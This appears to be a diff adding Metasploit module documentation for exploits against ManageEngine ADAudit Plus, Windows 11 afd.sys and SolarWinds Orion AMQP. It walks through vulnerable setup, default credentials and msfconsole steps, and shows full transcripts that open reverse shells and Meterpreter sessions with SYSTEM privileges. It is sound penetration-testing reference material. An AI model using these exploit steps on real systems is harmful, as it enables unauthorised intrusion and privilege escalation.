+[7005](https://archives2.manageengine.com/active-directory-audit/7005/ManageEngine_ADAudit_Plus_x64.exe) running on Windows Server 2012 R2.
+
+Successful exploitation will result in RCE as the user running ManageEngine ADAudit Plus, which will typically be the local administrator.
+
+Note that exploitation may require a few attempts before a shell is returned. This is because there may be a delay before 
+ManageEngine AdAudit Plus will properly fetch and process the alert which has been triggered. It is advisable to try a few
+times, wait a bit, and then try again if you haven't gotten a shell.
+
+## Installation Information
+Vulnerable versions of ADAudit Plus are available [here](https://archives2.manageengine.com/active-directory-audit/).
+Versions 7005 and prior are vulnerable by default, so no special configuration is required after installing the application.
+
+After running the installer, you can launch ADAudit Plus by opening a command prompt with administrator privileges
+and then running: `<install_dir>\bin\run.bat`. This will typically be at a location like `C:\Program Files\ManageEngine\ADAudit Plus\bin`.
+Note that you may be asked to accept a license agreement and then be prompted for a license to use. Choose the Evaluation
+license if this is the case. Note that targets running the Free license will not be able to be exploited due to limitations
+imposed by the Free license on how often updates are retrieved.
+
+Once this done, log into ADAudit Plus with the default credentials (set as default options for the module), aka `admin`:`admin`.
+If the prompt `Default Domain Controllers Policy not configured` appears, click on the Configure link that appears to have
+it configure the GPO Policy automatically for you.
+
+Then go to notifications and check for one that says `Product Not Installed As Service` and click on `Install Now`. Once
+this is done open `Group Policy Management` on the domain controller and go to Forest->Domains->Select your domain->
+Default Domain Policy and right click on it then click `Edit`.
+
+Select Computer Configuration->Policies->Windows Settings->Security Settings->Advanced Audit Policy Configuration->
+Audit Policies->Logon/Logoff and set `Audit Logoff`, `Audit Logon`, `Audit Special Logon` and `Audit Other Logon/Logoff Events`
+and check the `Configure the following audit events` box as well as the `Success` and `Failure` boxes beneath those.
+
+Finally log out of the web portal. You should be able to run the module now.
+
+## Verification Steps
+1. Start msfconsole
+2. Do: `use exploit/windows/http/manageengine_adaudit_plus_authenticated_rce`
+3. Do: `set RHOSTS [IP]`
+4. Do: `set LHOST [IP]`
+5. Do: `set USERNAME [username]`
+6. Do: `set PASSWORD [password]`
+7. Do: `exploit`
+8. Verify you get a shell on the target machine as the user running ManageEngine ADAudit Plus.
+
+## Options
+### AUTH_DOMAIN
+The ADAudit Plus authentication domain to use. The default is `ADAuditPlus Authentication`. If the provided domain
+does not match an authentication domain that is configured for the target, the module will throw an error and inform the user.
+
+### USERNAME
+Username to authenticate with. The default is `admin`, which matches the default ADAudit Plus credentials.
+
+### PASSWORD
+Password to authenticate with. The default is `admin`, which matches the default ADAudit Plus credentials.
+
+## Scenarios
+### ManageEngine ADAudit Plus build 7003 running on Windows Server 2012 R2
+```
+msf6 exploit(windows/http/manageengine_adaudit_plus_authenticated_rce) > options
+
+Module options (exploit/windows/http/manageengine_adaudit_plus_authenticated_rce):
+
+   Name         Current Setting             Required  Description
+   ----         ---------------             --------  -----------
+   AUTH_DOMAIN  ADAuditPlus Authentication  yes       ADAudit Plus authentication domain (default is ADAuditPlus Authentication)
+   PASSWORD     admin                       yes       Password to authenticate with
+   Proxies                                  no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS       192.168.91.250              yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT        8081                        yes       The target port (TCP)
+   SSL          false                       no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI    /                           yes       The base path to ManageEngine ADAudit Plus
+   USERNAME     admin                       yes       Username to authenticate with
+   VHOST                                    no        HTTP server virtual host
+
+
+Payload options (cmd/windows/powershell_reverse_tcp):
+
+   Name          Current Setting  Required  Description
+   ----          ---------------  --------  -----------
+   LHOST         192.168.91.195   yes       The listen address (an interface may be specified)
+   LOAD_MODULES                   no        A list of powershell modules separated by a comma to download over the web
+   LPORT         4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Windows Command
+
+
+msf6 exploit(windows/http/manageengine_adaudit_plus_authenticated_rce) > run
+
+[*] Started reverse TCP handler on 192.168.91.195:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Using configured authentication domain alias LIES.
+[*] Trying to authenticate...
+[*] Found 1 configured domain(s):
+[*] - LIES.local: LIES.local
+[+] Successfully authenticated
+[+] The target appears to be vulnerable. The target is ADAudit Plus 7003
+[*] Attempting to create an alert profile
+[+] Successfully created alert profile UiYnupjyi24
+[*] Attempting to trigger the payload via an authentication attempt for domain LIES using incorrect credentials.
+[*] Trigger attempt completed. Let's hope we get a shell...
+[*] Powershell session session 1 opened (192.168.91.195:4444 -> 192.168.91.250:54442) at 2022-10-12 12:09:43 +0300
+[*] Powershell session session 2 opened (192.168.91.195:4444 -> 192.168.91.250:54441) at 2022-10-12 12:09:43 +0300
+[*] Attempting to delete alert UiYnupjyi24
+[+] Successfully deleted alert UiYnupjyi24
+
+PS C:\Program Files\ManageEngine\ADAudit Plus\bin>whoami
+lies\administrator
+PS C:\Program Files\ManageEngine\ADAudit Plus\bin>
+```
+
+### ManageEngine ADAudit Plus build 7005 running on Windows Server 2012 R2
+```
+msf6 exploit(windows/http/manageengine_adaudit_plus_authenticated_rce) > run
+
+[*] Started reverse TCP handler on 192.168.91.195:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Using configured authentication domain alias LIES.
+[*] Trying to authenticate...
+[*] Found 1 configured domain(s):
+[*] - LIES.local: LIES.local
+[+] Successfully authenticated
+[+] The target appears to be vulnerable. The target is ADAudit Plus 7005 and the endpoint for CVE-2021-42847 exists.
+[*] Attempting to authenticate again in order to retrieve the required cookies.
+[*] Attempting to create an alert profile
+[*] Attempting to write the payload to /alert_scripts/mwlhr.ps1
+[+] Successfully wrote the payload to /alert_scripts/mwlhr.ps1 in the ManageEngine ADAudit Plus install directory
+[+] Successfully created alert profile dVmy0Ygz
+[*] Attempting to trigger the payload via an authentication attempt for domain LIES using incorrect credentials.
+[*] Trigger attempt completed. Let's hope we get a shell...
+[!] Make sure to manually cleanup the mwlhr.ps1 file from /alert_scripts/ in the ManageEngine ADAudit Plus install directory
+[*] Powershell session session 1 opened (192.168.91.195:4444 -> 192.168.91.250:41348) at 2022-10-12 12:59:28 +0300
+[*] Powershell session session 2 opened (192.168.91.195:4444 -> 192.168.91.250:41347) at 2022-10-12 12:59:28 +0300
+[*] Attempting to delete alert profile dVmy0Ygz
+[+] Successfully deleted profile alert dVmy0Ygz
+
+PS C:\Program Files\ManageEngine\ADAudit Plus\bin>whoami
+lies\administrator
+PS C:\Program Files\ManageEngine\ADAudit Plus\bin>
+```
+
+### ManageEngine ADAudit Plus build 6077 running on Windows Server 2022 - Powershell Payload
+```
+msf6 > use exploit/windows/http/manageengine_adaudit_plus_authenticated_rce
+[*] Using configured payload cmd/windows/powershell_reverse_tcp
+msf6 exploit(windows/http/manageengine_adaudit_plus_authenticated_rce) > set RHOSTS 192.168.204.132
+RHOSTS => 192.168.204.132
+msf6 exploit(windows/http/manageengine_adaudit_plus_authenticated_rce) > set LHOST 192.168.204.128
+LHOST => 192.168.204.128
+msf6 exploit(windows/http/manageengine_adaudit_plus_authenticated_rce) > show options
+
+Module options (exploit/windows/http/manageengine_adaudit_plus_authenticated_rce):
+
+   Name         Current Setting             Required  Description
+   ----         ---------------             --------  -----------
+   AUTH_DOMAIN  ADAuditPlus Authentication  yes       ADAudit Plus authentication domain (default is ADAuditPlus Authentication)
+   PASSWORD     admin                       yes       Password to authenticate with
+   Proxies                                  no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS       192.168.204.132             yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT        8081                        yes       The target port (TCP)
+   SSL          false                       no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI    /                           yes       The base path to ManageEngine ADAudit Plus
+   USERNAME     admin                       yes       Username to authenticate with
+   VHOST                                    no        HTTP server virtual host
+
+
+Payload options (cmd/windows/powershell_reverse_tcp):
+
+   Name          Current Setting  Required  Description
+   ----          ---------------  --------  -----------
+   LHOST         192.168.204.128  yes       The listen address (an interface may be specified)
+   LOAD_MODULES                   no        A list of powershell modules separated by a comma to download over the web
+   LPORT         4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Windows Command
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(windows/http/manageengine_adaudit_plus_authenticated_rce) > check
+
+[*] Using configured authentication domain alias DAFOREST.
+[*] Attempting to authenticate to ADAuditPlus Authentication with username: admin and password: admin
+[*] Found 1 configured domain(s): daforest.com
+[+] Successfully authenticated
+[*] 192.168.204.132:8081 - The target appears to be vulnerable. The target is ADAudit Plus 6077
+msf6 exploit(windows/http/manageengine_adaudit_plus_authenticated_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.204.128:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Using configured authentication domain alias DAFOREST.
+[*] Attempting to authenticate to ADAuditPlus Authentication with username: admin and password: admin
+[*] Found 1 configured domain(s): daforest.com
+[+] Successfully authenticated
+[+] The target appears to be vulnerable. The target is ADAudit Plus 6077
+[*] Attempting to create an alert profile
+[+] Successfully created alert profile fw4hKcxDG
+[*] Attempting to trigger the payload via an authentication attempt for domain DAFOREST using incorrect credentials.
+[*] Received expected reply when trying to trigger the payload. Let's hope we get a shell...
+[*] Powershell session session 2 opened (192.168.204.128:4444 -> 192.168.204.132:62845) at 2023-05-04 19:42:57 -0500
+[*] Powershell session session 1 opened (192.168.204.128:4444 -> 192.168.204.132:62844) at 2023-05-04 19:42:57 -0500
+[*] Attempting to delete alert profile fw4hKcxDG
+[+] Successfully deleted alert profile fw4hKcxDG
+
+PS C:\Program Files\ManageEngine\ADAudit Plus\bin> whoami
+daforest\administrator
+PS C:\Program Files\ManageEngine\ADAudit Plus\bin> ^X^Z
+Background session 2? [y/N]  y
+msf6 exploit(windows/http/manageengine_adaudit_plus_authenticated_rce) > sessions
+
+Active sessions
+===============
+
+  Id  Name  Type                Information                      Connection
+  --  ----  ----                -----------                      ----------
+  1         powershell windows  Administrator @ WIN-BRSHGJGIDFM  192.168.204.128:4444 -> 192.168.204.132:62844 (192.168.204.132)
+  2         powershell windows  Administrator @ WIN-BRSHGJGIDFM  192.168.204.128:4444 -> 192.168.204.132:62845 (192.168.204.132)
+
+msf6 exploit(windows/http/manageengine_adaudit_plus_authenticated_rce) >
+```
+
+### ManageEngine ADAudit Plus build 6077 running on Windows Server 2022 - Meterpreter Payload
+```
+msf6 > use exploit/windows/http/manageengine_adaudit_plus_authenticated_rce
+[*] Using configured payload cmd/windows/powershell_reverse_tcp
+msf6 exploit(windows/http/manageengine_adaudit_plus_authenticated_rce) > set RHOSTS 192.168.204.132
+RHOSTS => 192.168.204.132
+msf6 exploit(windows/http/manageengine_adaudit_plus_authenticated_rce) > set LHOST 192.168.204.128
+LHOST => 192.168.204.128
+msf6 exploit(windows/http/manageengine_adaudit_plus_authenticated_rce) > show options
+
+Module options (exploit/windows/http/manageengine_adaudit_plus_authenticated_rce):
+
+Name         Current Setting             Required  Description
+   ----         ---------------             --------  -----------
+AUTH_DOMAIN  ADAuditPlus Authentication  yes       ADAudit Plus authentication domain (default is ADAuditPlus Authentication)
+PASSWORD     admin                       yes       Password to authenticate with
+Proxies                                  no        A proxy chain of format type:host:port[,type:host:port][...]
+RHOSTS       192.168.204.132             yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+RPORT        8081                        yes       The target port (TCP)
+SSL          false                       no        Negotiate SSL/TLS for outgoing connections
+TARGETURI    /                           yes       The base path to ManageEngine ADAudit Plus
+USERNAME     admin                       yes       Username to authenticate with
+VHOST                                    no        HTTP server virtual host
+
+
+Payload options (cmd/windows/powershell_reverse_tcp):
+
+Name          Current Setting  Required  Description
+   ----          ---------------  --------  -----------
+LHOST         192.168.204.128  yes       The listen address (an interface may be specified)
+LOAD_MODULES                   no        A list of powershell modules separated by a comma to download over the web
+LPORT         4444             yes       The listen port
+
+
+Exploit target:
+
+Id  Name
+   --  ----
+0   Windows Command
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(windows/http/manageengine_adaudit_plus_authenticated_rce) > set payload cmd/windows/powershell/x64/meterpreter/reverse_tcp
+payload => cmd/windows/powershell/x64/meterpreter/reverse_tcp
+msf6 exploit(windows/http/manageengine_adaudit_plus_authenticated_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.204.128:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Using configured authentication domain alias DAFOREST.
+[*] Attempting to authenticate to ADAuditPlus Authentication with username: admin and password: admin
+[*] Found 1 configured domain(s): daforest.com
+[+] Successfully authenticated
+[+] The target appears to be vulnerable. The target is ADAudit Plus 6077
+[*] Attempting to create an alert profile
+[+] Successfully created alert profile iEQnR24qE9n1
+[*] Attempting to trigger the payload via an authentication attempt for domain DAFOREST using incorrect credentials.
+[*] Received expected reply when trying to trigger the payload. Let's hope we get a shell...
+[*] Sending stage (200774 bytes) to 192.168.204.132
+[*] Sending stage (200774 bytes) to 192.168.204.132
+[-] Failed to load extension: uninitialized constant Rex::Post::Meterpreter::Extensions::Stdapi::Stdapi
+WARNING: Local file /home/gwillcox/git/metasploit-framework/data/meterpreter/ext_server_priv.x64.dll is being used
+WARNING: Local files may be incompatible with the Metasploit Framework
+[!] If the client portion of stdapi or priv fails to load, you can do so manually via 'load stdapi' and/or load priv'
+[*] Meterpreter session 4 opened (192.168.204.128:4444 -> 192.168.204.132:62858) at 2023-05-04 19:45:48 -0500
+[*] Attempting to delete alert profile iEQnR24qE9n1
+[*] Meterpreter session 3 opened (192.168.204.128:4444 -> 192.168.204.132:62857) at 2023-05-04 19:45:48 -0500
+[+] Successfully deleted alert profile iEQnR24qE9n1
+
+meterpreter > load stdapi
+Loading extension stdapi...Success.
+meterpreter > load priv
+[!] The "priv" extension has already been loaded.
+meterpreter > whoami
+[-] Unknown command: whoami
+meterpreter > getuid
+Server username: DAFOREST\Administrator
+meterpreter > getprivs
+
+Enabled Process Privileges
+==========================
+
+Name
+----
+SeBackupPrivilege
+SeChangeNotifyPrivilege
+SeCreateGlobalPrivilege
+SeCreatePagefilePrivilege
+SeCreateSymbolicLinkPrivilege
+SeDebugPrivilege
+SeDelegateSessionUserImpersonatePrivilege
+SeEnableDelegationPrivilege
+SeImpersonatePrivilege
+SeIncreaseBasePriorityPrivilege
+SeIncreaseQuotaPrivilege
+SeIncreaseWorkingSetPrivilege
+SeLoadDriverPrivilege
+SeMachineAccountPrivilege
+SeManageVolumePrivilege
+SeProfileSingleProcessPrivilege
+SeRemoteShutdownPrivilege
+SeRestorePrivilege
+SeSecurityPrivilege
+SeShutdownPrivilege
+SeSystemEnvironmentPrivilege
+SeSystemProfilePrivilege
+SeSystemtimePrivilege
+SeTakeOwnershipPrivilege
+SeTimeZonePrivilege
+SeUndockPrivilege
+
+meterpreter > getsystem
+...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter >
+```
+
+### ManageEngine ADAudit Plus build 7005 running on Windows Server 2022 - Powershell Payload
+
+```
+msf6 > use exploit/windows/http/manageengine_adaudit_plus_authenticated_rce
+[*] Using configured payload cmd/windows/powershell_reverse_tcp
+msf6 exploit(windows/http/manageengine_adaudit_plus_authenticated_rce) > set RHOST 192.168.204.136
+RHOST => 192.168.204.136
+msf6 exploit(windows/http/manageengine_adaudit_plus_authenticated_rce) > set LHOST 192.168.204.128
+LHOST => 192.168.204.128
+msf6 exploit(windows/http/manageengine_adaudit_plus_authenticated_rce) > show options
+
+Module options (exploit/windows/http/manageengine_adaudit_plus_authenticated_rce):
+
+   Name         Current Setting             Required  Description
+   ----         ---------------             --------  -----------
+   AUTH_DOMAIN  ADAuditPlus Authentication  yes       ADAudit Plus authentication domain (default is ADAuditPlus Authentication)
+   PASSWORD     admin                       yes       Password to authenticate with
+   Proxies                                  no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS       192.168.204.136             yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT        8081                        yes       The target port (TCP)
+   SSL          false                       no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI    /                           yes       The base path to ManageEngine ADAudit Plus
+   USERNAME     admin                       yes       Username to authenticate with
+   VHOST                                    no        HTTP server virtual host
+
+
+Payload options (cmd/windows/powershell_reverse_tcp):
+
+   Name          Current Setting  Required  Description
+   ----          ---------------  --------  -----------
+   LHOST         192.168.204.128  yes       The listen address (an interface may be specified)
+   LOAD_MODULES                   no        A list of powershell modules separated by a comma to download over the web
+   LPORT         4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Windows Command
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(windows/http/manageengine_adaudit_plus_authenticated_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.204.128:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Using configured authentication domain alias DAFOREST.
+[*] Attempting to authenticate to ADAuditPlus Authentication with username: admin and password: admin
+[*] Found 1 configured domain(s): daforest.com
+[+] Successfully authenticated
+[+] The target appears to be vulnerable. The target is ADAudit Plus 7005 and the endpoint for CVE-2021-42847 exists.
+[*] Attempting to authenticate again in order to retrieve the required cookies.
+[*] Attempting to create an alert profile
+[*] Attempting to write the payload to /alert_scripts/akbgtwuva.ps1
+[+] Successfully wrote the payload to /alert_scripts/akbgtwuva.ps1 in the ManageEngine ADAudit Plus install directory
+[+] Successfully created alert profile VA8dDG52p5
+[*] Attempting to trigger the payload via an authentication attempt for domain DAFOREST using incorrect credentials.
+[*] Received expected reply when trying to trigger the payload. Let's hope we get a shell...
+[!] Make sure to manually cleanup the akbgtwuva.ps1 file from /alert_scripts/ in the ManageEngine ADAudit Plus install directory
+[*] Powershell session session 2 opened (192.168.204.128:4444 -> 192.168.204.136:53465) at 2023-05-08 12:01:55 -0500
+[*] Powershell session session 1 opened (192.168.204.128:4444 -> 192.168.204.136:53464) at 2023-05-08 12:01:55 -0500
+[*] Attempting to delete alert profile VA8dDG52p5
+[+] Successfully deleted alert profile VA8dDG52p5
+
+PS C:\Program Files\ManageEngine\ADAudit Plus\bin> whoami
+daforest\administrator
+PS C:\Program Files\ManageEngine\ADAudit Plus\bin> pwd
+
+Path                                          
+----                                          
+C:\Program Files\ManageEngine\ADAudit Plus\bin
+
+
+PS C:\Program Files\ManageEngine\ADAudit Plus\bin> ^Z
+Background session 2? [y/N]  y
+msf6 exploit(windows/http/manageengine_adaudit_plus_authenticated_rce) > sessions
+
+Active sessions
+===============
+
+  Id  Name  Type                Information                      Connection
+  --  ----  ----                -----------                      ----------
+  1         powershell windows  Administrator @ WIN-BRSHGJGIDFM  192.168.204.128:4444 -> 192.168.204.136:53464 (192.168.204.136)
+  2         powershell windows  Administrator @ WIN-BRSHGJGIDFM  192.168.204.128:4444 -> 192.168.204.136:53465 (192.168.204.136)
+
+msf6 exploit(windows/http/manageengine_adaudit_plus_authenticated_rce) > 
+```
@@ -0,0 +1,58 @@
+## Vulnerable Application
+
+A vulnerability exists in the Windows Ancillary Function Driver for Winsock
+(`afd.sys`) can be leveraged by an attacker to escalate privileges to those of
+NT AUTHORITY\SYSTEM. Due to a flaw in `AfdNotifyRemoveIoCompletion`, it is
+possible to create an arbitrary kernel Write-Where primitive, which can be used
+to manipulate internal I/O ring structures and achieve local privilege
+escalation.
+
+This exploit only supports Windows 11 22H2 up to build 22621.963 (patched in
+January 2023 updates).
+
+### Installation And Setup
+Windows 11 versions 22H2 (without the patch) are vulnerable out of the box.
+This exploit module has been tested on Windows 11 versions 22H2 build 22621.525
+and 22621.963.
+
+## Options
+No specific options to be set.
+
+## Verification Steps
+
+1. Start msfconsole
+1. Get a Meterpreter session on a vulnerable host
+1. Do: `use windows/local/cve_2023_21768_afd_lpe`
+1. Set the `SESSION` and `PAYLOAD` options
+1. Do: `run`
+1. You should get a privileged session.
+
+## Scenarios
+
+### Windows 11 Version 22H2 Build 22621.963 x64
+```
+msf6 exploit(windows/local/cve_2023_21768_afd_lpe) > run verbose=true
+
+[*] Started reverse TCP handler on 192.168.100.9:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Windows Build Number = 22621.963
+[+] The target appears to be vulnerable.
+[*] Launching netsh to host the DLL...
+[+] Process 3748 launched.
+[*] Reflectively injecting the DLL into 3748...
+[*] Sending stage (200774 bytes) to 192.168.100.9
+[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
+[*] Meterpreter session 11 opened (192.168.100.9:4444 -> 192.168.100.9:55346) at 2023-03-27 18:46:08 +0200
+
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > sysinfo
+Computer        : WIN11PRO
+OS              : Windows 10 (10.0 Build 22621).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x64/windows
+```
+
@@ -0,0 +1,54 @@
+## Vulnerable Application
+
+The SolarWinds Information Service (SWIS) is vulnerable to RCE by way of a crafted message received through the
+AMQP message queue. A malicious user that can authenticate to the AMQP service can publish such a crafted
+message whose body is a serialized .NET object which can lead to OS command execution as NT AUTHORITY\SYSTEM.
+
+## Verification Steps
+
+1. Install the application (tested SolarWindows Orion NPM versions 2020.2.5 and 2020.2.6)
+   1. After installation is complete, create an AMQP account so you know the credentials. The default account is `orion`.
+   2. Open a command prompt in `C:\Program Files (x86)\SolarWinds\Orion\RabbitMQ\sbin>`
+   3. Run: `.\rabbitmqctl.bat add_user "hax" "Password1!"`
+   4. Run: `.\rabbitmqctl.bat set_permissions hax .* .* .*`
+   5. Run: `.\rabbitmqctl.bat set_user_tags hax administrator`
+2. Start msfconsole
+3. Do: `use exploit/windows/misc/solarwinds_amqp_deserialization`
+4. Set the `RHOSTS`, `USERNAME`, `PASSWORD`, `PAYLOAD` and payload related-options
+5. Do: `run`
+6. You should get a shell.
+
+## Options
+
+## Scenarios
+
+### SolarWinds Orion NPM 2020.2.6 on Windows Server 2019 x64
+
+```
+msf6 > use exploit/windows/misc/solarwinds_amqp_deserialization 
+[*] Using configured payload cmd/windows/powershell/x64/meterpreter/reverse_tcp
+msf6 exploit(windows/misc/solarwinds_amqp_deserialization) > set RHOSTS 192.168.159.17
+RHOSTS => 192.168.159.17
+msf6 exploit(windows/misc/solarwinds_amqp_deserialization) > set USERNAME hax
+USERNAME => hax
+msf6 exploit(windows/misc/solarwinds_amqp_deserialization) > set PASSWORD Password1!
+PASSWORD => Password1!
+msf6 exploit(windows/misc/solarwinds_amqp_deserialization) > set VERBOSE true
+VERBOSE => true
+msf6 exploit(windows/misc/solarwinds_amqp_deserialization) > set PAYLOAD cmd/windows/powershell/meterpreter/reverse_tcp
+PAYLOAD => cmd/windows/powershell/meterpreter/reverse_tcp
+msf6 exploit(windows/misc/solarwinds_amqp_deserialization) > set LHOST 192.168.159.128
+LHOST => 192.168.159.128
+msf6 exploit(windows/misc/solarwinds_amqp_deserialization) > run
+
+[*] Powershell command length: 4175
+[*] Started reverse TCP handler on 192.168.159.128:4444 
+[*] 192.168.159.17:5671 - Successfully connected to the remote server.
+[*] 192.168.159.17:5671 - Successfully opened a new channel.
+[*] 192.168.159.17:5671 - Successfully published the message to the channel.
+[*] Sending stage (186438 bytes) to 192.168.159.17
+[*] Sending stage (186438 bytes) to 192.168.159.17
+[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.17:54960) at 2023-03-17 13:20:03 -0400
+
+meterpreter >
+```
--- a/Show More
+++ b/Show More
				`@@ -0,0 +1 @@`
				`This directory contains ActiveRecord concerns, models and validators.`